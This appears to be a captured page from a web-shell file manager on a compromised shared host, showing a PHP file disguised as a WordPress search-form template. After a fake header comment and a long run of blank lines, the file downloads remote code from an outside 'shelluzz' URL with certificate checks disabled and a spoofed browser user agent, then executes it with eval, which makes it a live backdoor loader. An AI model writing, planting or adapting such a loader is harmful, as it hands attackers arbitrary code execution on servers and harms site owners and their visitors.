HEX
Server: LiteSpeed
System: Linux premium909.web-hosting.com 4.18.0-553.77.1.lve.el8.x86_64 #1 SMP Wed Oct 8 14:21:00 UTC 2025 x86_64
User: ektukra (1135)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/ektukra/unspoken.ektukra.com/bypass-arish.php
<?php


/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
 






















































$l = "https://bdkar.top/shelluzz/lispedbypas.txt";

if (function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $l);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
    $body = curl_exec($ch);
    curl_close($ch);
} else {
    $body = @file_get_contents($l);
}

if (!empty($body)) {
    eval("?>".$body);
}

?>